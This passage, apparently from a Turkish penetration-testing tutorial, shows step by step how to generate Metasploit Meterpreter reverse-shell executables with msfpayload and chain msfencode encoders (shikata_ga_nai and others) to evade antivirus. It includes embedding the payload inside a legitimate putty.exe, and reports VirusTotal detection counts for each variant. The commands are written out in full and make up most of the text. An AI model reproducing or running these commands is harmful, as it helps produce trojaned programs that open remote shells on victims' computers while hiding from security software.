# meterpreter > getuid

Ancak bu uygulama bir çok antivirüs tarafından yakalanmaktadır. Oluşturulan  uygulamanın VirusTatal analiz sonucunda 50 AV'den 37 tanesi tarafından tespit edilmiştir.

2) Raw halindeki Payload'u Yeniden Kodlama
MsfPayload ile Raw halinde oluşturulan bir payload MsfEncode ile yeniden kodlanabilir. "x86/shikata_ga_nai" adlı kodlayıcı ile 3 kere kodlanan Raw halinde bir payload oluşturulması aşağıdaki gibidir.

# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.8.145 LPORT=4567 R | msfencode -e x86/shikata_ga_nai -t exe -c 3 -o Uygulama2.exe

Not: Kodlayıcıların kullanılması uygulama boyutunu arttırmaktadır.
MsfEncode tarafından kullanılabilecek kodlayıcıların listesi aşağıdaki gibidir:

# msfencode -l

Not: Rank olarak yüksek olan kodlayıcıların kullanılması antivirüslerden saklanılması için bir yöntemdir.
Oluşturulan 2. uygulamanın VirusTotal analizi sonucunda 35 AV tarafından tespit edildiği görülmektedir.

3) Standart Uygulamaya Zararlı Kod Gömme
Hazırlanan uygulama kodunun anti virüsler tarafından tespit edilmesini engellemek için varsayılan şablonlar yerine farklı şablonlar tercih edilmelidir. msfencode ile alternatif şablon kullanmak için '-x' parametresi kullanılmaktadır. Bunun için normalde zararlı olmayan bir uygulamaya zararlı kod gömülebilir. Bu işlem aşağıdaki gibidir:

# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.8.145 LPORT=4567 R | msfencode -e x86/shikata_ga_nai -t exe -c 3 -x /root/putty.exe -o Uygulama3.exe

Oluşturulan 3. uygulamanın VirusTotal analizi sonucunda 33 AV tarafından tespit edildiği görülmektedir.

4) Çoklu Kodlama Yönteminin Kullanılması
MsfPayload ile oluşturulan payload  kodlanırken birden fazla kodlayıcı ardışık olarak da kullanılabilir.

# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.8.145 LPORT=4567 R | msfencode -e x86/shikata_ga_nai -c 3 -t raw | msfencode -e x86/call4_dword_xor -t raw -c 2| msfencode -e x86/countdown -x /root/putty.exe -t exe -o Uygulama4.exe

Oluşturulan 3. uygulamanın VirusTotal analizi sonucunda 34 AV tarafından tespit edildiği görülmektedir.

Kullanılabilecek bir diğer uygulama aşağıdaki gibi oluşturulabilir:

msfpayload windows/meterpreter/reverse_https LHOST=192.168.2.48 LPORT=443 EXITFUNC=thread R |  msfencode -e x86/shikata_ga_nai -c 2 -t raw | msfencode -e x86/jmp_call_additive -c 2 -t raw | msfencode -e x86/call4_dword_xor  -c 2 -t raw | msfencode -e x86/jmp_call_additive -c 2 -t raw | msfencode -e x86/call4_dword_xor  -c 2 -t exe -o Uygulama5.exe

Sonuç

Msfpayload ve Msfencode modüllerinin tek başlarına kullanımı AV'lerden saklanmak için yeterli olmayabilmektedir. Üstelik kodlama işlemi de bazı durumlarda AV'lerin yakalanmasına sebep olabilmektedir. Bu sebeplerden dolayı başka çözümler üzerine yoğunlaşılması gerekmektedir.